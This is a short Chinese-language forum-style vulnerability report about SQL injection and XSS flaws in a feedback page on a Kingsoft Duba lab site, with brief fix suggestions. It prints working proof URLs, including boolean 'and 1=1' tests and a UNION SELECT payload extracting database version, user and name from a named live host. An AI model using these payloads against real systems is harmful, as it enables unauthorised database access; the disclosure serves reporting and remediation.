金山毒霸多个sql注入及XSS漏洞和修复
<p> 第一个</p><p> 简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限</p>
<p> 详细说明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2</p>
<p> 漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1</p>
<p> http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2</p>
<p> 结果明显不同 注入漏洞产生</p>
<p> 修复方案:过滤变量app</p>
<p> 第二个</p>
<p> 简要描述:过滤不严导致存在SQL注入</p>
<p> 详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限</p>
<p> 漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--</p>
<p> http://labs.duba.net/robots.txt</p>
<p> 未作进一步测试</p>
<p> 修复方案:过滤参数</p>
<p> 第三个:</p>
<p> 简要描述:留言处过滤不严 造成跨站漏洞</p>
<p> 详细说明:留言处过滤不严 造成跨站漏洞</p>
<p> 漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5</p>
頁:
[1]